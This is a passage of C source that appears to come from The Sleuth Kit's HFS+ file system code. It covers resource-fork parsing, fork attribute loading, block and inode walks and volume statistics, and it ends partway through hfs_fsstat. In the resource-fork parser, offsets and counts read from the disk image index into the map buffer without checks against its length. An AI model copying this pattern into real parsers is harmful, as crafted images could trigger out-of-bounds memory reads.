RES_DESCRIPTOR *result = NULL;
RES_DESCRIPTOR *last = NULL;
TSK_FS_INFO *fs_info;
hfs_fork *fork_info;
hfs_fork *resForkInfo;
uint64_t resSize;
const TSK_FS_ATTR *rAttr;
hfs_resource_fork_header rfHeader;
hfs_resource_fork_header *resHead;
uint32_t dataOffset;
uint32_t mapOffset;
uint32_t mapLength;
char *map;
int attrReadResult;
int attrReadResult1;
int attrReadResult2;
hfs_resource_fork_map_header *mapHdr;
uint16_t typeListOffset;
uint16_t nameListOffset;
unsigned char hasNameList;
char *nameListBegin = NULL;
hfs_resource_type_list *typeList;
uint16_t numTypes;
hfs_resource_type_list_item *tlItem;
int mindx; // index for looping over resource types
if (fs_file == NULL) {
error_detected(TSK_ERR_FS_ARG,
"hfs_parse_resource_fork: null fs_file");
return NULL;
}
if (fs_file->meta == NULL) {
error_detected(TSK_ERR_FS_ARG,
"hfs_parse_resource_fork: fs_file has null metadata");
return NULL;
}
if (fs_file->meta->content_ptr == NULL) {
if (tsk_verbose)
fprintf(stderr,
"hfs_parse_resource_fork: fs_file has null fork data structures, so no resources.\n");
return NULL;
}
// Extract the fs
fs_info = fs_file->fs_info;
if (fs_info == NULL) {
error_detected(TSK_ERR_FS_ARG,
"hfs_parse_resource_fork: null fs within fs_info");
return NULL;
}
// Try to look at the Resource Fork for an HFS+ file
// Should be able to cast this to hfs_fork *
fork_info = (hfs_fork *) fs_file->meta->content_ptr; // The data fork
// The resource fork is the second one.
resForkInfo = &fork_info[1];
resSize = tsk_getu64(fs_info->endian, resForkInfo->logic_sz);
//uint32_t numBlocks = tsk_getu32(fs_info->endian, resForkInfo->total_blk);
//uint32_t clmpSize = tsk_getu32(fs_info->endian, resForkInfo->clmp_sz);
// Hmm, certainly no resources here!
if (resSize == 0) {
return NULL;
}
// OK, resource size must be > 0
// find the attribute for the resource fork
rAttr =
tsk_fs_file_attr_get_type(fs_file, TSK_FS_ATTR_TYPE_HFS_RSRC,
HFS_FS_ATTR_ID_RSRC, TRUE);
if (rAttr == NULL) {
error_returned
("hfs_parse_resource_fork: could not get the resource fork attribute");
return NULL;
}
// JUST read the resource fork header
attrReadResult1 =
tsk_fs_attr_read(rAttr, 0, (char *) &rfHeader,
sizeof(hfs_resource_fork_header), TSK_FS_FILE_READ_FLAG_NONE);
if (attrReadResult1 < 0
|| attrReadResult1 != sizeof(hfs_resource_fork_header)) {
error_returned
(" hfs_parse_resource_fork: trying to read the resource fork header");
return NULL;
}
// Begin to parse the resource fork
resHead = &rfHeader;
dataOffset = tsk_getu32(fs_info->endian, resHead->dataOffset);
mapOffset = tsk_getu32(fs_info->endian, resHead->mapOffset);
//uint32_t dataLength = tsk_getu32(fs_info->endian, resHead->dataLength);
mapLength = tsk_getu32(fs_info->endian, resHead->mapLength);
// Read in the WHOLE map
map = (char *) tsk_malloc(mapLength);
if (map == NULL) {
error_returned
("- hfs_parse_resource_fork: could not allocate space for the resource fork map");
return NULL;
}
attrReadResult =
tsk_fs_attr_read(rAttr, (uint64_t) mapOffset, map,
(size_t) mapLength, TSK_FS_FILE_READ_FLAG_NONE);
if (attrReadResult < 0 || attrReadResult != mapLength) {
error_returned
("- hfs_parse_resource_fork: could not read the map");
free(map);
return NULL;
}
mapHdr = (hfs_resource_fork_map_header *) map;
typeListOffset = tsk_getu16(fs_info->endian, mapHdr->typeListOffset);
nameListOffset = tsk_getu16(fs_info->endian, mapHdr->nameListOffset);
if (nameListOffset >= mapLength || nameListOffset == 0) {
hasNameList = FALSE;
}
else {
hasNameList = TRUE;
nameListBegin = map + nameListOffset;
}
typeList = (hfs_resource_type_list *) (map + typeListOffset);
numTypes = tsk_getu16(fs_info->endian, typeList->typeCount) + 1;
for (mindx = 0; mindx < numTypes; ++mindx) {
uint16_t numRes;
uint16_t refOff;
int pindx; // index for looping over resources
uint16_t rID;
uint32_t rOffset;
tlItem = &(typeList->type[mindx]);
numRes = tsk_getu16(fs_info->endian, tlItem->count) + 1;
refOff = tsk_getu16(fs_info->endian, tlItem->offset);
for (pindx = 0; pindx < numRes; ++pindx) {
int16_t nameOffset;
char *nameBuffer;
RES_DESCRIPTOR *rsrc;
char lenBuff[4]; // first 4 bytes of a resource encodes its length
uint32_t rLen; // Resource length
hfs_resource_refListItem *item =
((hfs_resource_refListItem *) (((uint8_t *) typeList) +
refOff)) + pindx;
nameOffset = tsk_gets16(fs_info->endian, item->resNameOffset);
nameBuffer = NULL;
if (hasNameList && nameOffset != -1) {
char *name = nameListBegin + nameOffset;
uint8_t nameLen = (uint8_t) name[0];
nameBuffer = tsk_malloc(nameLen + 1);
if (nameBuffer == NULL) {
error_returned
("hfs_parse_resource_fork: allocating space for the name of a resource");
free_res_descriptor(result);
return NULL;
}
memcpy(nameBuffer, name + 1, nameLen);
nameBuffer[nameLen] = (char) 0;
}
else {
nameBuffer = tsk_malloc(7);
if (nameBuffer == NULL) {
error_returned
("hfs_parse_resource_fork: allocating space for the (null) name of a resource");
free_res_descriptor(result);
return NULL;
}
memcpy(nameBuffer, "<none>", 6);
nameBuffer[6] = (char) 0;
}
rsrc = (RES_DESCRIPTOR *) tsk_malloc(sizeof(RES_DESCRIPTOR));
if (rsrc == NULL) {
error_returned
("hfs_parse_resource_fork: space for a resource descriptor");
free_res_descriptor(result);
return NULL;
}
// Build the linked list
if (result == NULL)
result = rsrc;
if (last != NULL)
last->next = rsrc;
last = rsrc;
rsrc->next = NULL;
rID = tsk_getu16(fs_info->endian, item->resID);
rOffset =
tsk_getu24(fs_info->endian,
item->resDataOffset) + dataOffset;
// Just read the first four bytes of the resource to get its length. It MUST
// be at least 4 bytes long
attrReadResult2 = tsk_fs_attr_read(rAttr, (uint64_t) rOffset,
lenBuff, (size_t) 4, TSK_FS_FILE_READ_FLAG_NONE);
if (attrReadResult2 != 4) {
error_returned
("- hfs_parse_resource_fork: could not read the 4-byte length at beginning of resource");
free_res_descriptor(result);
return NULL;
}
rLen = tsk_getu32(TSK_BIG_ENDIAN, lenBuff); //TODO
rsrc->id = rID;
rsrc->offset = rOffset + 4;
memcpy(rsrc->type, tlItem->type, 4);
rsrc->type[4] = (char) 0;
rsrc->length = rLen;
rsrc->name = nameBuffer;
} // END loop over resources of one type
} // END loop over resource types
return result;
}
static uint8_t
hfs_load_attrs(TSK_FS_FILE * fs_file)
{
TSK_FS_INFO *fs;
HFS_INFO *hfs;
TSK_FS_ATTR *fs_attr;
TSK_FS_ATTR_RUN *attr_run;
hfs_fork *forkx;
unsigned char resource_fork_has_contents = FALSE;
unsigned char compression_flag = FALSE;
unsigned char isCompressed = FALSE;
unsigned char compDataInRSRCFork = FALSE;
unsigned char cmpType = 0;
uint64_t uncompressedSize;
uint64_t logicalSize; // of a fork
// clean up any error messages that are lying around
tsk_error_reset();
if ((fs_file == NULL) || (fs_file->meta == NULL)
|| (fs_file->fs_info == NULL)) {
error_detected(TSK_ERR_FS_ARG,
"hfs_load_attrs: fs_file or meta is NULL");
return 1;
}
fs = (TSK_FS_INFO *) fs_file->fs_info;
hfs = (HFS_INFO *) fs;
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_attrs: Processing file %" PRIuINUM "\n",
fs_file->meta->addr);
// see if we have already loaded the runs
if (fs_file->meta->attr_state == TSK_FS_META_ATTR_STUDIED) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_attrs: Attributes already loaded\n");
return 0;
}
else if (fs_file->meta->attr_state == TSK_FS_META_ATTR_ERROR) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_attrs: Previous attempt to load attributes resulted in error\n");
return 1;
}
// Now (re)-initialize the attrlist that will hold the list of attributes
if (fs_file->meta->attr != NULL) {
tsk_fs_attrlist_markunused(fs_file->meta->attr);
}
else if (fs_file->meta->attr == NULL) {
fs_file->meta->attr = tsk_fs_attrlist_alloc();
}
/****************** EXTENDED ATTRIBUTES *******************************/
// We do these first, so that we can detect the mode of compression, if
// any. We need to know that mode in order to handle the forks.
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_attrs: loading the HFS+ extended attributes\n");
if (hfs_load_extended_attrs(fs_file, &isCompressed,
&cmpType, &uncompressedSize)) {
error_returned(" - hfs_load_attrs A");
fs_file->meta->attr_state = TSK_FS_META_ATTR_ERROR;
return 1;
}
// TODO: What about DECMPFS_TYPE_RAW_RSRC?
switch (cmpType) {
case DECMPFS_TYPE_ZLIB_RSRC:
case DECMPFS_TYPE_LZVN_RSRC:
compDataInRSRCFork = TRUE;
break;
default:
compDataInRSRCFork = FALSE;
break;
}
if (isCompressed) {
fs_file->meta->size = uncompressedSize;
}
// This is the flag indicating compression, from the Catalog File record.
compression_flag = (fs_file->meta->flags & TSK_FS_META_FLAG_COMP) != 0;
if (compression_flag && !isCompressed) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_attrs: WARNING, HFS marks this as a"
" compressed file, but no compression record was found.\n");
}
if (isCompressed && !compression_flag) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_attrs: WARNING, this file has a compression"
" record, but the HFS compression flag is not set.\n");
}
/************* FORKS (both) ************************************/
// Process the data and resource forks. We only do this if the
// fork data structures are non-null, so test that:
if (fs_file->meta->content_ptr != NULL) {
/************** DATA FORK STUFF ***************************/
// Get the data fork data-structure
forkx = (hfs_fork *) fs_file->meta->content_ptr;
// If this is a compressed file, then either this attribute is already loaded
// because the data was in the compression record, OR
// the compressed data is in the resource fork. We will load those runs when
// we handle the resource fork.
if (!isCompressed) {
// We only load this attribute if this fork has non-zero length
// or if this is a REG or LNK file. Otherwise, we skip
logicalSize = tsk_getu64(fs->endian, forkx->logic_sz);
if (logicalSize > 0 ||
fs_file->meta->type == TSK_FS_META_TYPE_REG ||
fs_file->meta->type == TSK_FS_META_TYPE_LNK) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_attrs: loading the data fork attribute\n");
// get an attribute structure to store the data in
if ((fs_attr = tsk_fs_attrlist_getnew(fs_file->meta->attr,
TSK_FS_ATTR_NONRES)) == NULL) {
error_returned(" - hfs_load_attrs");
return 1;
}
/* NOTE that fs_attr is now tied to fs_file->meta->attr.
* that means that we do not need to free it if we abort in the
* following code (and doing so will cause double free errors). */
if (logicalSize > 0) {
// Convert runs of blocks to the TSK internal form
if (((attr_run =
hfs_extents_to_attr(fs, forkx->extents,
0)) == NULL)
&& (tsk_error_get_errno() != 0)) {
error_returned(" - hfs_load_attrs");
return 1;
}
// add the runs to the attribute and the attribute to the file.
if (tsk_fs_attr_set_run(fs_file, fs_attr, attr_run,
"", TSK_FS_ATTR_TYPE_HFS_DATA,
HFS_FS_ATTR_ID_DATA, logicalSize, logicalSize,
(TSK_OFF_T) tsk_getu32(fs->endian,
forkx->total_blk) * fs->block_size, 0,
0)) {
error_returned(" - hfs_load_attrs (DATA)");
tsk_fs_attr_run_free(attr_run);
return 1;
}
// see if extents file has additional runs
if (hfs_ext_find_extent_record_attr(hfs,
(uint32_t) fs_file->meta->addr, fs_attr,
TRUE)) {
error_returned(" - hfs_load_attrs B");
fs_file->meta->attr_state = TSK_FS_META_ATTR_ERROR;
return 1;
}
}
else {
// logicalSize == 0, but this is either a REG or LNK file
// so, it should have a DATA fork attribute of zero length.
if (tsk_fs_attr_set_run(fs_file, fs_attr, NULL, "",
TSK_FS_ATTR_TYPE_HFS_DATA, HFS_FS_ATTR_ID_DATA,
0, 0, 0, 0, 0)) {
error_returned(" - hfs_load_attrs (non-file)");
return 1;
}
}
} // END logicalSize>0 or REG or LNK file type
} // END if not Compressed
/************** RESOURCE FORK STUFF ************************************/
// Get the resource fork.
//Note that content_ptr points to an array of two
// hfs_fork data structures, the second of which
// describes the blocks of the resource fork.
forkx = &((hfs_fork *) fs_file->meta->content_ptr)[1];
logicalSize = tsk_getu64(fs->endian, forkx->logic_sz);
// Skip if the length of the resource fork is zero
if (logicalSize > 0) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_attrs: loading the resource fork\n");
resource_fork_has_contents = TRUE;
// get an attribute structure to store the resource fork data in. We will
// reuse the fs_attr variable, since we are done with the data fork.
if ((fs_attr =
tsk_fs_attrlist_getnew(fs_file->meta->attr,
TSK_FS_ATTR_NONRES)) == NULL) {
error_returned(" - hfs_load_attrs (RSRC)");
return 1;
}
/* NOTE that fs_attr is now tied to fs_file->meta->attr.
* that means that we do not need to free it if we abort in the
* following code (and doing so will cause double free errors). */
// convert the resource fork to the TSK format
if (((attr_run =
hfs_extents_to_attr(fs, forkx->extents,
0)) == NULL)
&& (tsk_error_get_errno() != 0)) {
error_returned(" - hfs_load_attrs");
return 1;
}
// add the runs to the attribute and the attribute to the file.
if (tsk_fs_attr_set_run(fs_file, fs_attr, attr_run, "RSRC",
TSK_FS_ATTR_TYPE_HFS_RSRC, HFS_FS_ATTR_ID_RSRC,
tsk_getu64(fs->endian, forkx->logic_sz),
tsk_getu64(fs->endian, forkx->logic_sz),
(TSK_OFF_T) tsk_getu32(fs->endian,
forkx->total_blk) * fs->block_size, 0, 0)) {
error_returned(" - hfs_load_attrs (RSRC)");
tsk_fs_attr_run_free(attr_run);
return 1;
}
// see if extents file has additional runs for the resource fork.
if (hfs_ext_find_extent_record_attr(hfs,
(uint32_t) fs_file->meta->addr, fs_attr, FALSE)) {
error_returned(" - hfs_load_attrs C");
fs_file->meta->attr_state = TSK_FS_META_ATTR_ERROR;
return 1;
}
if (isCompressed && compDataInRSRCFork) {
// OK, we are going to load those same resource fork blocks as the "DATA"
// attribute, but will mark it as compressed.
// get an attribute structure to store the resource fork data in. We will
// reuse the fs_attr variable, since we are done with the data fork.
if (tsk_verbose)
tsk_fprintf(stderr,
"File is compressed with data in the resource fork. "
"Loading the default DATA attribute.\n");
if ((fs_attr =
tsk_fs_attrlist_getnew(fs_file->meta->attr,
TSK_FS_ATTR_NONRES)) == NULL) {
error_returned
(" - hfs_load_attrs (RSRC loading as DATA)");
return 1;
}
/* NOTE that fs_attr is now tied to fs_file->meta->attr.
* that means that we do not need to free it if we abort in the
* following code (and doing so will cause double free errors). */
switch (cmpType) {
case DECMPFS_TYPE_ZLIB_RSRC:
#ifdef HAVE_LIBZ
fs_attr->w = hfs_attr_walk_zlib_rsrc;
fs_attr->r = hfs_file_read_zlib_rsrc;
#else
// We don't have zlib, so the uncompressed data is not
// available to us; however, we must have a default DATA
// attribute, or icat will misbehave.
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_attrs: No zlib compression library, so setting a zero-length default DATA attribute.\n");
if (tsk_fs_attr_set_run(fs_file, fs_attr, NULL, "DATA",
TSK_FS_ATTR_TYPE_HFS_DATA, HFS_FS_ATTR_ID_DATA, 0,
0, 0, 0, 0)) {
error_returned(" - hfs_load_attrs (non-file)");
return 1;
}
#endif
break;
case DECMPFS_TYPE_LZVN_RSRC:
fs_attr->w = hfs_attr_walk_lzvn_rsrc;
fs_attr->r = hfs_file_read_lzvn_rsrc;
break;
}
// convert the resource fork to the TSK format
if (((attr_run =
hfs_extents_to_attr(fs, forkx->extents,
0)) == NULL)
&& (tsk_error_get_errno() != 0)) {
error_returned
(" - hfs_load_attrs, RSRC fork as DATA fork");
return 1;
}
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_attrs: Loading RSRC fork block runs as the default DATA attribute.\n");
// add the runs to the attribute and the attribute to the file.
if (tsk_fs_attr_set_run(fs_file, fs_attr, attr_run, "DECOMP",
TSK_FS_ATTR_TYPE_HFS_DATA, HFS_FS_ATTR_ID_DATA,
logicalSize,
logicalSize,
(TSK_OFF_T) tsk_getu32(fs->endian,
forkx->total_blk) * fs->block_size,
TSK_FS_ATTR_COMP | TSK_FS_ATTR_NONRES, 0)) {
error_returned
(" - hfs_load_attrs (RSRC loading as DATA)");
tsk_fs_attr_run_free(attr_run);
return 1;
}
// see if extents file has additional runs for the resource fork.
if (hfs_ext_find_extent_record_attr(hfs,
(uint32_t) fs_file->meta->addr, fs_attr, FALSE)) {
error_returned
(" - hfs_load_attrs (RSRC loading as DATA");
fs_file->meta->attr_state = TSK_FS_META_ATTR_ERROR;
return 1;
}
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_attrs: setting the \"special\" function pointers to inflate compressed data.\n");
}
} // END resource fork size > 0
} // END the fork data structures are non-NULL
if (isCompressed && compDataInRSRCFork && !resource_fork_has_contents) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_load_attrs: WARNING, compression record claims that compressed data"
" is in the Resource Fork, but that fork is empty or non-existent.\n");
}
// Finish up.
fs_file->meta->attr_state = TSK_FS_META_ATTR_STUDIED;
return 0;
}
/** \internal
* Get allocation status of file system block.
* adapted from IsAllocationBlockUsed from:
* http://developer.apple.com/technotes/tn/tn1150.html
*
* @param hfs File system being analyzed
* @param b Block address
* @returns 1 if allocated, 0 if not, -1 on error
*/
static int8_t
hfs_block_is_alloc(HFS_INFO * hfs, TSK_DADDR_T a_addr)
{
TSK_FS_INFO *fs = &(hfs->fs_info);
TSK_OFF_T b;
size_t b2;
// lazy loading
if (hfs->blockmap_file == NULL) {
if ((hfs->blockmap_file =
tsk_fs_file_open_meta(fs, NULL,
HFS_ALLOCATION_FILE_ID)) == NULL) {
tsk_error_errstr2_concat(" - Loading blockmap file");
return -1;
}
/* cache the data attribute */
hfs->blockmap_attr =
tsk_fs_attrlist_get(hfs->blockmap_file->meta->attr,
TSK_FS_ATTR_TYPE_DEFAULT);
if (!hfs->blockmap_attr) {
tsk_error_errstr2_concat
(" - Data Attribute not found in Blockmap File");
return -1;
}
hfs->blockmap_cache_start = -1;
hfs->blockmap_cache_len = 0;
}
// get the byte offset
b = (TSK_OFF_T) a_addr / 8;
if (b > hfs->blockmap_file->meta->size) {
tsk_error_set_errno(TSK_ERR_FS_CORRUPT);
tsk_error_set_errstr("hfs_block_is_alloc: block %" PRIuDADDR
" is too large for bitmap (%" PRIuOFF ")", a_addr,
hfs->blockmap_file->meta->size);
return -1;
}
// see if it is in the cache
if ((hfs->blockmap_cache_start == -1)
|| (hfs->blockmap_cache_start > b)
|| (hfs->blockmap_cache_start + hfs->blockmap_cache_len <= b)) {
size_t cnt = tsk_fs_attr_read(hfs->blockmap_attr, b,
hfs->blockmap_cache,
sizeof(hfs->blockmap_cache), 0);
if (cnt < 1) {
tsk_error_set_errstr2
("hfs_block_is_alloc: Error reading block bitmap at offset %"
PRIuOFF, b);
return -1;
}
hfs->blockmap_cache_start = b;
hfs->blockmap_cache_len = cnt;
}
b2 = (size_t) (b - hfs->blockmap_cache_start);
return (hfs->blockmap_cache[b2] & (1 << (7 - (a_addr % 8)))) != 0;
}
TSK_FS_BLOCK_FLAG_ENUM
hfs_block_getflags(TSK_FS_INFO * a_fs, TSK_DADDR_T a_addr)
{
return (hfs_block_is_alloc((HFS_INFO *) a_fs, a_addr) == 1) ?
TSK_FS_BLOCK_FLAG_ALLOC : TSK_FS_BLOCK_FLAG_UNALLOC;
}
static uint8_t
hfs_block_walk(TSK_FS_INFO * fs, TSK_DADDR_T start_blk,
TSK_DADDR_T end_blk, TSK_FS_BLOCK_WALK_FLAG_ENUM flags,
TSK_FS_BLOCK_WALK_CB action, void *ptr)
{
char *myname = "hfs_block_walk";
HFS_INFO *hfs = (HFS_INFO *) fs;
TSK_FS_BLOCK *fs_block;
TSK_DADDR_T addr;
if (tsk_verbose)
tsk_fprintf(stderr,
"%s: start_blk: %" PRIuDADDR " end_blk: %"
PRIuDADDR " flags: %" PRIu32 "\n", myname, start_blk, end_blk,
flags);
// clean up any error messages that are lying around
tsk_error_reset();
/*
* Sanity checks.
*/
if (start_blk < fs->first_block || start_blk > fs->last_block) {
tsk_error_set_errno(TSK_ERR_FS_WALK_RNG);
tsk_error_set_errstr("%s: invalid start block number: %" PRIuDADDR
"", myname, start_blk);
return 1;
}
if (end_blk < fs->first_block || end_blk > fs->last_block) {
tsk_error_set_errno(TSK_ERR_FS_WALK_RNG);
tsk_error_set_errstr("%s: invalid last block number: %" PRIuDADDR
"", myname, end_blk);
return 1;
}
if (start_blk > end_blk)
XSWAP(start_blk, end_blk);
/* Sanity check on flags -- make sure at least one ALLOC is set */
if (((flags & TSK_FS_BLOCK_WALK_FLAG_ALLOC) == 0) &&
((flags & TSK_FS_BLOCK_WALK_FLAG_UNALLOC) == 0)) {
flags |=
(TSK_FS_BLOCK_WALK_FLAG_ALLOC |
TSK_FS_BLOCK_WALK_FLAG_UNALLOC);
}
if (((flags & TSK_FS_BLOCK_WALK_FLAG_META) == 0) &&
((flags & TSK_FS_BLOCK_WALK_FLAG_CONT) == 0)) {
flags |=
(TSK_FS_BLOCK_WALK_FLAG_CONT | TSK_FS_BLOCK_WALK_FLAG_META);
}
if ((fs_block = tsk_fs_block_alloc(fs)) == NULL) {
return 1;
}
/*
* Iterate
*/
for (addr = start_blk; addr <= end_blk; ++addr) {
int retval;
int myflags;
/* identify if the block is allocated or not */
myflags = hfs_block_is_alloc(hfs, addr) ?
TSK_FS_BLOCK_FLAG_ALLOC : TSK_FS_BLOCK_FLAG_UNALLOC;
// test if we should call the callback with this one
if ((myflags & TSK_FS_BLOCK_FLAG_ALLOC)
&& (!(flags & TSK_FS_BLOCK_WALK_FLAG_ALLOC)))
continue;
else if ((myflags & TSK_FS_BLOCK_FLAG_UNALLOC)
&& (!(flags & TSK_FS_BLOCK_WALK_FLAG_UNALLOC)))
continue;
if (flags & TSK_FS_BLOCK_WALK_FLAG_AONLY)
myflags |= TSK_FS_BLOCK_FLAG_AONLY;
if (tsk_fs_block_get_flag(fs, fs_block, addr,
(TSK_FS_BLOCK_FLAG_ENUM) myflags) == NULL) {
tsk_fs_block_free(fs_block);
return 1;
}
retval = action(fs_block, ptr);
if (TSK_WALK_STOP == retval) {
break;
}
else if (TSK_WALK_ERROR == retval) {
tsk_fs_block_free(fs_block);
return 1;
}
}
tsk_fs_block_free(fs_block);
return 0;
}
uint8_t
hfs_inode_walk(TSK_FS_INFO * fs, TSK_INUM_T start_inum,
TSK_INUM_T end_inum, TSK_FS_META_FLAG_ENUM flags,
TSK_FS_META_WALK_CB action, void *ptr)
{
TSK_INUM_T inum;
TSK_FS_FILE *fs_file;
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_inode_walk: start_inum: %" PRIuINUM " end_inum: %"
PRIuINUM " flags: %" PRIu32 "\n", start_inum, end_inum, flags);
/*
* Sanity checks.
*/
if (start_inum < fs->first_inum || start_inum > fs->last_inum) {
tsk_error_reset();
tsk_error_set_errno(TSK_ERR_FS_WALK_RNG);
tsk_error_set_errstr("inode_walk: Start inode: %" PRIuINUM "",
start_inum);
return 1;
}
else if (end_inum < fs->first_inum || end_inum > fs->last_inum
|| end_inum < start_inum) {
tsk_error_reset();
tsk_error_set_errno(TSK_ERR_FS_WALK_RNG);
tsk_error_set_errstr("inode_walk: End inode: %" PRIuINUM "",
end_inum);
return 1;
}
/* If ORPHAN is wanted, then make sure that the flags are correct */
if (flags & TSK_FS_META_FLAG_ORPHAN) {
flags |= TSK_FS_META_FLAG_UNALLOC;
flags &= ~TSK_FS_META_FLAG_ALLOC;
flags |= TSK_FS_META_FLAG_USED;
flags &= ~TSK_FS_META_FLAG_UNUSED;
}
else {
if (((flags & TSK_FS_META_FLAG_ALLOC) == 0) &&
((flags & TSK_FS_META_FLAG_UNALLOC) == 0)) {
flags |= (TSK_FS_META_FLAG_ALLOC | TSK_FS_META_FLAG_UNALLOC);
}
/* If neither of the USED or UNUSED flags are set, then set them
* both
*/
if (((flags & TSK_FS_META_FLAG_USED) == 0) &&
((flags & TSK_FS_META_FLAG_UNUSED) == 0)) {
flags |= (TSK_FS_META_FLAG_USED | TSK_FS_META_FLAG_UNUSED);
}
}
if ((fs_file = tsk_fs_file_alloc(fs)) == NULL)
return 1;
if ((fs_file->meta = tsk_fs_meta_alloc(HFS_FILE_CONTENT_LEN)) == NULL)
return 1;
if (start_inum > end_inum)
XSWAP(start_inum, end_inum);
for (inum = start_inum; inum <= end_inum; ++inum) {
int retval;
if (hfs_inode_lookup(fs, fs_file, inum)) {
// deleted files may not exist in the catalog
if (tsk_error_get_errno() == TSK_ERR_FS_INODE_NUM) {
tsk_error_reset();
continue;
}
else {
return 1;
}
}
if ((fs_file->meta->flags & flags) != fs_file->meta->flags)
continue;
/* call action */
retval = action(fs_file, ptr);
if (retval == TSK_WALK_STOP) {
tsk_fs_file_close(fs_file);
return 0;
}
else if (retval == TSK_WALK_ERROR) {
tsk_fs_file_close(fs_file);
return 1;
}
}
tsk_fs_file_close(fs_file);
return 0;
}
/* return the name of a file at a given inode
* in a newly-allocated string, or NULL on error
*/
char *
hfs_get_inode_name(TSK_FS_INFO * fs, TSK_INUM_T inum)
{
HFS_INFO *hfs = (HFS_INFO *) fs;
HFS_ENTRY entry;
char *fn = NULL;
if (hfs_cat_file_lookup(hfs, inum, &entry, FALSE))
return NULL;
fn = malloc(HFS_MAXNAMLEN + 1);
if (fn == NULL)
return NULL;
if (hfs_UTF16toUTF8(fs, entry.thread.name.unicode,
tsk_getu16(fs->endian, entry.thread.name.length), fn,
HFS_MAXNAMLEN + 1, HFS_U16U8_FLAG_REPLACE_SLASH)) {
free(fn);
return NULL;
}
return fn;
}
/* print the name of a file at a given inode
* returns 0 on success, 1 on error */
static uint8_t
print_inode_name(FILE * hFile, TSK_FS_INFO * fs, TSK_INUM_T inum)
{
HFS_INFO *hfs = (HFS_INFO *) fs;
char fn[HFS_MAXNAMLEN + 1];
HFS_ENTRY entry;
if (hfs_cat_file_lookup(hfs, inum, &entry, FALSE))
return 1;
if (hfs_UTF16toUTF8(fs, entry.thread.name.unicode,
tsk_getu16(fs->endian, entry.thread.name.length), fn,
HFS_MAXNAMLEN + 1, HFS_U16U8_FLAG_REPLACE_SLASH))
return 1;
tsk_fprintf(hFile, "%s", fn);
return 0;
}
/* tail recursive function to print a path... prints the parent path, then
* appends / and the name of the given inode. prints nothing for root
* returns 0 on success, 1 on failure
*/
static uint8_t
print_parent_path(FILE * hFile, TSK_FS_INFO * fs, TSK_INUM_T inum)
{
HFS_INFO *hfs = (HFS_INFO *) fs;
char fn[HFS_MAXNAMLEN + 1];
HFS_ENTRY entry;
if (inum == HFS_ROOT_INUM)
return 0;
if (inum <= HFS_ROOT_INUM) {
tsk_error_set_errno(TSK_ERR_FS_INODE_NUM);
tsk_error_set_errstr("print_parent_path: out-of-range inode %"
PRIuINUM, inum);
return 1;
}
if (hfs_cat_file_lookup(hfs, inum, &entry, FALSE))
return 1;
if (hfs_UTF16toUTF8(fs, entry.thread.name.unicode,
tsk_getu16(fs->endian, entry.thread.name.length), fn,
HFS_MAXNAMLEN + 1,
HFS_U16U8_FLAG_REPLACE_SLASH | HFS_U16U8_FLAG_REPLACE_CONTROL))
return 1;
if (print_parent_path(hFile, fs, (TSK_INUM_T) tsk_getu32(fs->endian,
entry.thread.parent_cnid)))
return 1;
tsk_fprintf(hFile, "/%s", fn);
return 0;
}
/* print the file name corresponding to an inode, in brackets after a space.
* uses Unix path conventions, and does not include the volume name.
* returns 0 on success, 1 on failure
*/
static uint8_t
print_inode_file(FILE * hFile, TSK_FS_INFO * fs, TSK_INUM_T inum)
{
tsk_fprintf(hFile, " [");
if (inum == HFS_ROOT_INUM)
tsk_fprintf(hFile, "/");
else {
if (print_parent_path(hFile, fs, inum)) {
tsk_fprintf(hFile, "unknown]");
return 1;
}
}
tsk_fprintf(hFile, "]");
return 0;
}
static uint8_t
hfs_fscheck(TSK_FS_INFO * fs, FILE * hFile)
{
tsk_error_reset();
tsk_error_set_errno(TSK_ERR_FS_UNSUPFUNC);
tsk_error_set_errstr("fscheck not implemented for HFS yet");
return 1;
}
static uint8_t
hfs_fsstat(TSK_FS_INFO * fs, FILE * hFile)
{
// char *myname = "hfs_fsstat";
HFS_INFO *hfs = (HFS_INFO *) fs;
hfs_plus_vh *sb = hfs->fs;
time_t mac_time;
TSK_INUM_T inode;
char timeBuf[128];
if (tsk_verbose)
tsk_fprintf(stderr, "hfs_fstat: called\n");
tsk_fprintf(hFile, "FILE SYSTEM INFORMATION\n");
tsk_fprintf(hFile, "--------------------------------------------\n");
tsk_fprintf(hFile, "File System Type: ");
if (tsk_getu16(fs->endian, hfs->fs->signature) == HFS_VH_SIG_HFSPLUS)
tsk_fprintf(hFile, "HFS+\n");
else if (tsk_getu16(fs->endian, hfs->fs->signature) == HFS_VH_SIG_HFSX)
tsk_fprintf(hFile, "HFSX\n");
else
tsk_fprintf(hFile, "Unknown\n");
// print name and number of version
tsk_fprintf(hFile, "File System Version: ");
switch (tsk_getu16(fs->endian, hfs->fs->version)) {
case 4:
tsk_fprintf(hFile, "HFS+\n");
break;
case 5:
tsk_fprintf(hFile, "HFSX\n");
break;
default:
tsk_fprintf(hFile, "Unknown (%" PRIu16 ")\n",
tsk_getu16(fs->endian, hfs->fs->version));
break;
}
if (tsk_getu16(fs->endian, hfs->fs->signature) == HFS_VH_SIG_HFSX) {
tsk_fprintf(hFile, "Case Sensitive: %s\n",
hfs->is_case_sensitive ? "yes" : "no");
}
if (hfs->hfs_wrapper_offset > 0) {
tsk_fprintf(hFile,
"File system is embedded in an HFS wrapper at offset %" PRIuOFF
"\n", hfs->hfs_wrapper_offset);
}
tsk_fprintf(hFile, "\nVolume Name: ");
if (print_inode_name(hFile, fs, HFS_ROOT_INUM))
return 1;
tsk_fprintf(hFile, "\n");
tsk_fprintf(hFile, "Volume Identifier: %08" PRIx32 "%08" PRIx32 "\n",
tsk_getu32(fs->endian, sb->finder_info[HFS_VH_FI_ID1]),
tsk_getu32(fs->endian, sb->finder_info[HFS_VH_FI_ID2]));
// print last mounted info
tsk_fprintf(hFile, "\nLast Mounted By: ");
